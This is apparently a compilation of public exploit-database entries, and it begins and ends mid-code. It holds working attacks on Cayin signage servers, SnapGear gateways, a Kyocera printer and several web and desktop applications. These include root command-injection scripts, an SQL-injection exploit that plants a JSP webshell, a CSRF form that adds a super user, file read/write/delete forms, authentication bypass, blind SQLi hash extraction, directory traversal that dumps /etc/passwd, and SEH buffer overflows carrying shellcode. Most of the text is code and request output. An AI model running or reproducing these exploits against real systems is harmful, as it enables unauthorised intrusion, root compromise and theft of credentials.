name=\"submit\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------8759967759481129101498329242--\x0d\x0a' \ $"$url/user/marriage-reg-form.php" >>/dev/null } upload #Execute the given command shell_file=$(curl -s $url/user/images/ | grep ".php" | grep -Eo 'href="[^\"]+"' | sed 's/href=//g' | sed 's/\"//g' | grep -m1 '') check=$(echo $command | grep " " | wc -l) if [[ $check > 0 ]] then fixed_command=$(echo $command | sed 's/ /%20/g') curl -s "$url/user/images/$shell_file?cmd=$fixed_command" else curl -s "$url/user/images/$shell_file?cmd=$command" fi echo "IF YOU DONT GET RESPONSE OF THE COMMAND YOU GAVE, PROBABLY YOU GAVE WRONG CREDENTIALS" echo "After first exploit, even if you give wrong credentials it'll work since the file is already uploaded" shift $((OPTIND-1))

# Title: Cayin Content Management Server 11.0 - Remote Command Injection (root) # Author:LiquidWorm # Date: 2020-06-04 # Vendor: https://www.cayintech.com # CVE: N/A Cayin Content Management Server 11.0 Root Remote Command Injection Vendor: CAYIN Technology Co., Ltd. Product web page: https://www.cayintech.com Affected version: CMS-SE v11.0 Build 19179 CMS-SE v11.0 Build 19025 CMS-SE v11.0 Build 18325 CMS Station (CMS-SE-LXC) CMS-60 v11.0 Build 19025 CMS-40 v9.0 Build 14197 CMS-40 v9.0 Build 14099 CMS-40 v9.0 Build 14093 CMS-20 v9.0 Build 14197 CMS-20 v9.0 Build 14092 CMS v8.2 Build 12199 CMS v8.0 Build 11175 CMS v7.5 Build 11175 Summary: CAYIN Technology provides Digital Signage solutions, including media players, servers, and software designed for the DOOH (Digital Out-of-home) networks. We develop industrial-grade digital signage appliances and tailored services so you don't have to do the hard work. Desc: CAYIN CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user through the 'NTP_Server_IP' HTTP POST parameter in system.cgi page. Tested on: Apache/1.3.42 (Unix) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5570 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php 15.05.2020 --- Session created with default credentials (webadmin:bctvadmin). HTTP POST Request: ----------------- POST /cgi-bin/system.cgi HTTP/1.1 Host: 192.168.1.3 Content-Length: 201 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Smith Origin: http://192.168.1.3 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.3/cgi-bin/system.cgi Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957 Connection: close save_system: 1 system_date: 2020/5/16 06:36:48 TIMEZONE: 49 NTP_Service: 1 NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk) TEST_NTP: 測試 reboot1: 1 reboot_sel1: 4 reboot_sel2: 1 reboot_sel3: 1 font_list: ZH_TW Request recorder @ ZSL: ----------------------- Origin of HTTP request: 192.168.1.3:61347 HTTP GET request to vrfy.zeroscience.mk: GET / HTTP/1.0 User-Agent: MyVoiceIsMyPassportVerifyMe Host: vrfy.zeroscience.mk Accept: */* Connection: Keep-Alive PoC script: ----------- import requests url = "http://192.168.1.3:80/cgi-bin/system.cgi" cookies = {"cy_lang": "ZH_TW", "cy_us": "67176fd7d3d05812008", "cy_en": "c8bef8607e54c99059cc6a36da982f9c009", "WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST", "WEB_STR_SYSTEM": "SYSTEM_SETTING", "cy_cgi_tp": "1591206269_15957"} headers = {"Cache-Control": "max-age=0", "Origin": "http://192.168.1.3", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Smith", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.3/cgi-bin/system.cgi", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} data = {"save_system": "1", "system_date": "2020/5/16 06:36:48", "TIMEZONE": "49", "NTP_Service": "1", "NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd& "TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6", "reboot1": "1", "reboot_sel1": "4", "reboot_sel2": "1", "reboot_sel3": "1", "font_list": "ZH_TW"} requests.post(url, headers=headers, cookies=cookies, data=data)

# Title: SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User) # Author: LiquidWorm # Date: 2020-06-04 # Vendor: http://www.securecomputing.com # CVE: N/A Secure Computing SnapGear Management Console SG560 v3.1.5 CSRF Add Super User Vendor: Secure Computing Corp. Product web page: http://www.securecomputing.com Affected version: 3.1.5u1 Summary: The SG gateway appliance range provides Internet security and privacy of communications for small and medium enterprises, and branch offices. It simply and securely connects your office to the Internet, and with its robust stateful firewall, shields your computers from external threats. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: fnord/1.9 Apache 1.3.27 (Unix) Linux 2.4.31 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5567 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5567.php 14.05.2020 -- CSRF Add Super User: -------------------- <html> <body> <form action="http://10.0.2.2/cgi-bin/cgix/adminusers" method="POST"> <input type="hidden" name=".form" value="edit" /> <input type="hidden" name=".page" value="adminusers_edit" /> <input type="hidden" name="login" value="testingus" /> <input type="hidden" name="fullname" value="ZSL" /> <input type="hidden" name="password" value="123456" /> <input type="hidden" name="confirm" value="123456" /> <input type="hidden" name="acl.login" value="on" /> <input type="hidden" name="acl.admin" value="on" /> <input type="hidden" name="acl.diags" value="on" /> <input type="hidden" name="acl.saverestore" value="on" /> <input type="hidden" name="acl.setpassword" value="on" /> <input type="hidden" name="finish" value="Finish" /> <input type="hidden" name=".defaultname" value="finish" /> <input type="submit" value="Idemo" /> </form> </body> </html> Result /etc/shadow: root:$1$YC$T/M8HLRXxKKPVEO7SU.02/:0:0:Super User:/:/bin/sh sshd:!!:100:65534::/home:/bin/false clamav:!!:103:65534::/home:/bin/false testingus:$1$Xy$bxdLgsRlXHoMjEcMKqVq/.:104:104:ZSL:/home:/bin/sh

# Title: Cayin Digital Signage System xPost 2.5 - Remote Command Injection # Author:LiquidWorm # Date: 2020-06-04 # Vendor: https://www.cayintech.com # CVE: N/A #!/usr/bin/env python3 # # # Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution # # # Vendor: CAYIN Technology Co., Ltd. # Product web page: https://www.cayintech.com # Affected version: 2.5.18103 # 2.0 # 1.0 # # Summary: CAYIN xPost is the web-based application software, which offers a # combination of essential tools to create rich contents for digital signage in # different vertical markets. It provides an easy-to-use platform for instant # data entry and further extends the usage of CAYIN SMP players to meet users' # requirements of frequent, daily maintenance. # # Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability. # Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp # is not properly sanitised before being returned to the user or used in SQL queries. # This can be exploited to manipulate SQL queries by injecting arbitrary SQL code # and execute SYSTEM commands. # # -------------------------------------------------------------------------------- # lqwrm@zslab:~$ python3 wayfinder.py 192.168.2.1:8888 # # Injecting... # # Executing... # # Command: whoami # # nt authority\system # # # You have a webshell @ http://192.168.2.1:8888/thricer.jsp # lqwrm@zslab:~$ # -------------------------------------------------------------------------------- # # Tested on: Microsoft Windows 10 Home # Microsoft Windows 8.1 # Microsoft Windows Server 2016 # Microsoft Windows Server 2012 # Microsoft Windows 7 Ultimate SP1 # Apache Tomcat/9.0.1 # MySQL/5.0 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5571 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php # # # 15.05.2020 # import requests as req import time as vremeto import sys as sistemot import re as regularno if len(sistemot.argv) < 2: print("Cayin xPost 2.5 Pre-Auth SQLi RCE") print("Usage: ./wayfinder.py ip:port") sistemot.exit(19) else: ip = sistemot.argv[1] filename = "thricer.jsp" urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid=" constr = "-251' UNION ALL SELECT " print("# Injecting...") cmdjsp = "0x3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612" cmdjsp += "e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d64" cmdjsp += "2e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0" cmdjsp += "a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f" cmdjsp += "323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484" cmdjsp += "f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c" cmdjsp += "494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e505" cmdjsp += "55420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f" cmdjsp += "524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657" cmdjsp += "465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e70" cmdjsp += "72696e746c6e2822436f6d6d616e643a2022202b20726571756573742e67657450617" cmdjsp += "2616d657465722822636d642229202b20223c42523e22293b0a202020202020202050" cmdjsp += "726f636573732070203d2052756e74696d652e67657452756e74696d6528292e65786" cmdjsp += "56328726571756573742e676574506172616d657465722822636d642229293b0a2020" cmdjsp += "2020202020204f757470757453747265616d206f73203d20702e6765744f757470757" cmdjsp += "453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d" cmdjsp += "20702e676574496e70757453747265616d28293b0a202020202020202044617461496" cmdjsp += "e70757453747265616d20646973203d206e65772044617461496e7075745374726561" cmdjsp += "6d28696e293b0a2020202020202020537472696e672064697372203d206469732e726" cmdjsp += "561644c696e6528293b0a20202020202020207768696c652028206469737220213d20" cmdjsp += "6e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746" cmdjsp += "c6e2864697372293b200a2020202020202020202020202020202064697372203d2064" cmdjsp += "69732e726561644c696e6528293b200a202020202020202020202020202020207d0a2" cmdjsp += "0202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a" cmdjsp += "0a0a" columns = ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL " sqlwrite = "INTO DUMPFILE 'C:/CayinApps/webapps/" + filename + "'-- -" mysqli = constr + cmdjsp + columns + sqlwrite r = req.get("http://" + ip + urlpath + mysqli, allow_redirects = True) vremeto.sleep(1) print("# Executing...") r = req.get("http://" + ip + "/" + filename + "?cmd=whoami") clean = regularno.compile("<pre>(.*)</pre>", flags = regularno.S).search(r.text) clean = clean.group(1).replace("<BR>", "\n") print(clean) print("You have a webshell @ http://" + ip + "/" + filename)

# Title: Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read # Author:LiquidWorm # Date: 2020-06-04 # Vendor: http://www.securecomputing.com # CVE: N/A Secure Computing SnapGear Management Console SG560 v3.1.5 Arbitrary File Read/Write Vendor: Secure Computing Corp. Product web page: http://www.securecomputing.com Affected version: 3.1.5u1 Summary: The SG gateway appliance range provides Internet security and privacy of communications for small and medium enterprises, and branch offices. It simply and securely connects your office to the Internet, and with its robust stateful firewall, shields your computers from external threats. Desc: The application allows the currently logged-in user to edit the configuration files in the system using the CGI executable 'edit_config_files' in /cgi-bin/cgix/. The files that are allowed to be modified (read/write/delete) are located in the /etc/config/ directory. An attacker can manipulate the POST request parameters to escape from the restricted environment by using absolute path and start reading, writing and deleting arbitrary files on the system. Tested on: fnord/1.9 Apache 1.3.27 (Unix) Linux 2.4.31 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5568 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5568.php 14.05.2020 -- Read: ----- <html> <body> <form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST"> <input type="hidden" name=".form" value="choices" /> <input type="hidden" name=".page" value="select_file" /> <input type="hidden" name="name$1337" value="/var/log/messages" /> <input type="hidden" name="modify$1337" value="1" /> <input type="hidden" name=".defaultname" value="newitem" /> <input type="submit" value="Read" /> </form> </body> </html> Write/overwrite/move: --------------------- <html> <body> <form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST"> <input type="hidden" name=".form" value="edit" /> <input type="hidden" name=".page" value="edit_file" /> <input type="hidden" name="enabled$0" value="" /> <input type="hidden" name="name$0" value="/etc/motd" /> <input type="hidden" name="mode$0" value="" /> <input type="hidden" name="filename" value="/etc/motd" /> <input type="hidden" name="filecontents" value="pwned" /> <input type="hidden" name="finish" value="Finish" /> <input type="hidden" name=".defaultname" value="finish" /> <input type="submit" value="Write" /> </form> </body> </html> Delete: ------- <html> <body> <form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST"> <input type="hidden" name=".form" value="choices" /> <input type="hidden" name=".page" value="select_file" /> <input type="hidden" name="name$251" value="/root/.secret" /> <input type="hidden" name="delete$251" value="1" /> <input type="hidden" name=".defaultname" value="newitem" /> <input type="submit" value="Delete" /> </form> </body> </html>

# Title: Cayin Signage Media Player 3.0 - Remote Command Injection (root) # Author:LiquidWorm # Date: 2020-06-04 # Vendor: https://www.cayintech.com # CVE: N/A #!/usr/bin/env python3 # # # Cayin Signage Media Player 3.0 Root Remote Command Injection # # # Vendor: CAYIN Technology Co., Ltd. # Product web page: https://www.cayintech.com # Affected version: SMP-8000QD v3.0 # SMP-8000 v3.0 # SMP-6000 v3.0 Build 19025 # SMP-6000 v1.0 Build 14246 # SMP-6000 v1.0 Build 14199 # SMP-6000 v1.0 Build 14167 # SMP-6000 v1.0 Build 14097 # SMP-6000 v1.0 Build 14090 # SMP-6000 v1.0 Build 14069 # SMP-6000 v1.0 Build 14062 # SMP-4000 v1.0 Build 14098 # SMP-4000 v1.0 Build 14092 # SMP-4000 v1.0 Build 14087 # SMP-2310 v3.0 # SMP-2300 v3.0 Build 19316 # SMP-2210 v3.0 Build 19025 # SMP-2200 v3.0 Build 19029 # SMP-2200 v3.0 Build 19025 # SMP-2100 v10.0 Build 16228 # SMP-2100 v3.0 # SMP-2000 v1.0 Build 14167 # SMP-2000 v1.0 Build 14087 # SMP-1000 v1.0 Build 14099 # SMP-PROPLUS v1.5 Build 10081 # SMP-WEBPLUS v6.5 Build 11126 # SMP-WEB4 v2.0 Build 13073 # SMP-WEB4 v2.0 Build 11175 # SMP-WEB4 v1.5 Build 11476 # SMP-WEB4 v1.5 Build 11126 # SMP-WEB4 v1.0 Build 10301 # SMP-300 v1.0 Build 14177 # SMP-200 v1.0 Build 13080 # SMP-200 v1.0 Build 12331 # SMP-PRO4 v1.0 # SMP-NEO2 v1.0 # SMP-NEO v1.0 # # Summary: CAYIN Technology provides Digital Signage # solutions, including media players, servers, and # software designed for the DOOH (Digital Out-of-home) # networks. We develop industrial-grade digital signage # appliances and tailored services so you don't have # to do the hard work. # # Desc: CAYIN SMP-xxxx suffers from an authenticated # OS command injection vulnerability using default # credentials. This can be exploited to inject and # execute arbitrary shell commands as the root user # through the 'NTP_Server_IP' HTTP GET parameter in # system.cgi and wizard_system.cgi pages. # # ----------------------------------------------------- # $ ./cayin.py 192.168.1.2 id # uid=0(root) gid=65534(guest) # # start sshd # $ ./cayin.py 192.168.1.2 /mnt/libs/sshd/sbin/sshd # $ # $ ./cayin.py 192.168.1.2 "netstat -ant|grep ':22'" # tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN # tcp 0 0 :::22 :::* LISTEN # $ ./cayin.py 192.168.1.2 "cat /etc/passwd" # root:x:0:0:root:/root:/bin/bash # vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin # smbuser:x:500:0:SMB adiministrator:/opt/media:/sbin/nologin # sshd:x:1000:0::/dev/null:/sbin/nologin # $ # ----------------------------------------------------- # # Tested on: CAYIN Technology KT-Linux v0.99 # Apache/1.3.42 (Unix) # Apache/1.3.41 (Unix) # PHP/5.2.5 # Linux 2.6.37 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5569 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5569.php # # # 15.05.2020 # import requests import sys#____ import re#_____ if len(sys.argv) < 3: print("Cayin SMP WebManager Post-Auth RCE") print("Usage: ./cayin.py [ip] [cmd]") sys.exit(17) else: ip____address = sys.argv[1] ex____command = sys.argv[2] ur____identif = b"\x68\x74\x74\x70\x3a\x2f\x2f" ur____identif += (bytes(ip____address, "utf-8")) ur____identif += b"\x2f\x63\x67\x69\x2d\x62\x69" ur____identif += b"\x6e\x2f\x77\x69\x7a\x61\x72" ur____identif += b"\x64\x5f\x73\x79\x73\x74\x65" ur____identif += b"\x6d\x2e\x63\x67\x69\x3f\x54" ur____identif += b"\x45\x53\x54\x5f\x4e\x54\x50" ur____identif += b"\x3d\x31\x26\x4e\x54\x50\x5f" ur____identif += b"\x53\x65\x72\x76\x65\x72\x5f" ur____identif += b"\x49\x50\x3d\x70\x6f\x6f\x6c" ur____identif += b"\x2e\x6e\x74\x70\x2e\x6f\x72" ur____identif += b"\x67\x25\x32\x36" ##########" ur____identif += (bytes(ex____command, "utf-8")) ur____identif += b"\x25\x32\x36" ##############" ht____request = requests.get(ur____identif, auth = ("webadmin", "admin")) re____outputs = re.search("</html>\n(.*)", ht____request.text, flags = re.S).group().strip("</html>\n") print(re____outputs)

# Exploit Title: Online Course Registration 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-06-05 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : admin/index.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/Online%20Course%20Registration/admin/index.php POST /Online%20Course%20Registration/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 61 Referer: http://localhost/Online%20Course%20Registration/admin/index.php Cookie: PHPSESSID=il6a0lzq8ndo1bb4672rd7cr3m Connection: keep-alive Upgrade-Insecure-Requests: 1 username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined HTTP/1.1 302 Found Date: Thu, 04 Jun 2020 20:04:27 GMT Server: Apache/2.4.39 (Win64) PHP/7.3.5 X-Powered-By: PHP/7.3.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: http://localhost/Online Course Registration/admin/change-password.php

# Exploit Title: Online-Exam-System 2015 - 'feedback' SQL Injection # Date: 2020-06-04 # Exploit Author: Gus Ralph # Vendor Homepage: https://github.com/sunnygkp10/ # Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git # Affected Version: 2015 # Tested on: Ubuntu # CVE : N/A import requests, string, time from sys import stdout URL = raw_input("Please enter the URL to attack (example http://localhost/Online-Exam-System/)\n") payload = "feedback' , '2020-06-04', '01:58:10am'),('1337','test','[email protected]','test',(SELECT CASE WHEN (SELECT EXISTS(SELECT password FROM user WHERE password REGEXP BINARY '^" payload2 = ".*'))=1 THEN sleep(5) ELSE sleep(0) END),'2020-06-04', '01:58:10am'); -- -" so_far = hash = "" while True: for i in string.digits + string.ascii_lowercase: so_far = hash + i payload_to_send = payload + str(so_far) + payload2 data = {"name":"test","email":"[email protected]","subject":"test","feedback":payload_to_send} start = time.time() r = requests.post(URL + "feed.php", data = data) request_time = time.time() - start if request_time > 5: hash += i stdout.write(i) stdout.flush() break if len(hash) > 31: stdout.write("\n") print "Hash found: " + hash break

# Exploit Title : Kyocera Printer d-COPIA253MF - Directory Traversal (PoC) # Exploit Author: Hakan Eren ŞAN # Date: 2020-06-06 # Vendor Homepage: https://www.kyoceradocumentsolutions.com.tr/tr.html # Version: d-COPIA253MF plus # Tested on : Linux # Credit: Berat Isler # First step , you can capture the main page # Then create a directory traveral payload like ../../../ this # Then you add nullbyte to the end of the payload(%00) # Last step sent your request This is the code : Request: GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1 Host: X.X.X.X User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: rtl=0 Upgrade-Insecure-Requests: 1 If-None-Match: "/wlmeng/index.htm, Thu, 04 Jun 2020 13:41:16 GMT" Cache-Control: max-age=0 Response: HTTP/1.1 200 OK Content-Length: 843 Date: Thu, 04 Jun 2020 16:09:54 GMT Server: KM-MFP-http/V0.0.1 Last-Modified: Thu, 04 Jun 2020 13:41:16 GMT ETag: "/wlmeng/../../../../../../../../../../../etc/passwd, Thu, 04 Jun 2020 13:41:16 GMT" Content-Type: text/html root::0:0:root:/root:/bin/sh bin:*:1:1:bin:/bin:/bin/sh daemon:*:2:2:daemon:/usr/sbin:/bin/sh sys:*:3:3:sys:/dev:/bin/sh adm:*:4:4:adm:/var/adm:/bin/sh lp:*:5:7:lp:/var/spool/lpd:/bin/sh sync:*:6:8:sync:/bin:/bin/sync shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown halt:*:8:10:halt:/sbin:/sbin/halt mail:*:9:11:mail:/var/mail:/bin/sh news:*:10:12:news:/var/spool/news:/bin/sh uucp:*:11:13:uucp:/var/spool/uucp:/bin/sh operator:*:12:0:operator:/root:/bin/sh games:*:13:60:games:/usr/games:/bin/sh ftp:*:15:14:ftp:/var/ftp:/bin/sh man:*:16:20:man:/var/cache/man:/bin/sh www:*:17:18:www-data:/var/www:/bin/sh sshd:*:18:19:sshd:/var/run/sshd:/bin/sh proxy:*:19:21:proxy:/bin:/bin/sh telnetd:*:20:22:proxy:/bin:/bin/sh backup:*:34:34:backup:/var/backups:/bin/sh ais:*:101:101:ais:/var/run/ais:/bin/sh nobody:*:65534:65534:nobody:/nonexistent:/bin/sh

# Exploit Title: Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) # Vendor Homepage: http://www.frigate3.com/ # Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe # Exploit Author: Paras Bhatia # Discovery Date: 2020-06-07 # Vulnerable Software: Frigate # Version: <= 3.36.0.9 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) #Steps to Produce the Crash: # 1.- Run python code: FrigateLCE.py # 2.- Copy content to clipboard # 3.- Turn off DEP for Frigate3.exe # 4.- Open "Frigate3.exe" # 5.- Go to "Command" > "Command Line" > "Activate Command Line" # 6.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application. # 7.- Press Enter from Keyboard. # 7.- Click on OK in the dialog box that appears. # 8.- Calc.exe runs. ################################################################################################################################################# #Python "FrigateLCE.py" Code: f= open("FrigateLCE.txt", "w") junk="A" * 4112 nseh="\xeb\x20\x90\x90" seh="\x4B\x0C\x01\x40" #40010C4B 5B POP EBX #40010C4C 5D POP EBP #40010C4D C3 RETN #POP EBX ,POP EBP, RETN | [rtl60.bpl] (C:\Program Files\Frigate3\rtl60.bpl) nops="\x90" * 50 # msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python buf = "" buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b" buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18" buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f" buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63" buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5" buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac" buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee" buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21" buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc" buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb" buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33" buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae" buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f" buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10" buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6" buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1" buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05" payload = junk + nseh + seh + nops + buf f.write(payload) f.close

# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection # Date: 2020-06-07 # Exploit Author: Pankaj Kumar Thakur # Vendor Homepage: http://virtualairlinesmanager.net/ # Dork: inurl:notam_id= # Affected Version: 2.6.2 # Tested on: Ubuntu # CVE : N/A Vulnerable parameter ------------------- notam_id=%27%27 Id parameter's value is going into sql query directly! Proof of concept --------------- https://localhost:8080/vam/index.php?page=notam&notam_id=11%27%27 Submitted: Jun 1 2020 Fixed: Jun 5 2020 Acknowledgement : https://ibb.co/Y3WYdFN

# Exploit Title: Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH) # Date: 2020-06-05 # Author: Felipe Winsnes # Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html # Version: 1.3 # Tested on: Windows 7 # Proof of Concept: # 1.- Run the python script "poc.py", it will create a new file "poc.m3l" # 2.- Open the application, # 3.- Click on the bottom-right button with the letters "PL" # 4.- Select the option "File" # 5.- Click "Load List" # 6.- Select poc.m3l # 7.- Profit # Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Exploiting-Quick-Player/ # Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings6/18.gif # msfvenom -p windows/messagebox TEXT=pwned! -e x86/unicode_mixed -f py EXITFUNC=thread BufferRegister=EAX # Payload size: 640 bytes buf = b"" buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" buf += b"\x47\x42\x39\x75\x34\x4a\x42\x37\x69\x5a\x4b\x73\x6b" buf += b"\x59\x49\x71\x64\x6f\x34\x69\x64\x70\x31\x4a\x32\x47" buf += b"\x42\x61\x67\x6e\x51\x35\x79\x43\x34\x64\x4b\x62\x51" buf += b"\x4c\x70\x64\x4b\x70\x76\x5a\x6c\x64\x4b\x74\x36\x4d" buf += b"\x4c\x44\x4b\x51\x36\x4b\x58\x64\x4b\x71\x6e\x6d\x50" buf += b"\x64\x4b\x4d\x66\x4e\x58\x70\x4f\x6b\x68\x31\x65\x4a" buf += b"\x53\x62\x39\x49\x71\x78\x51\x79\x6f\x58\x61\x53\x30" buf += b"\x42\x6b\x52\x4c\x6b\x74\x4f\x34\x52\x6b\x50\x45\x6d" buf += b"\x6c\x72\x6b\x6e\x74\x4c\x68\x33\x48\x69\x71\x4a\x4a" buf += b"\x52\x6b\x70\x4a\x6a\x78\x32\x6b\x31\x4a\x4d\x50\x6a" buf += b"\x61\x6a\x4b\x79\x53\x6e\x54\x4e\x69\x44\x4b\x6f\x44" buf += b"\x54\x4b\x6d\x31\x5a\x4e\x6d\x61\x39\x6f\x4e\x51\x69" buf += 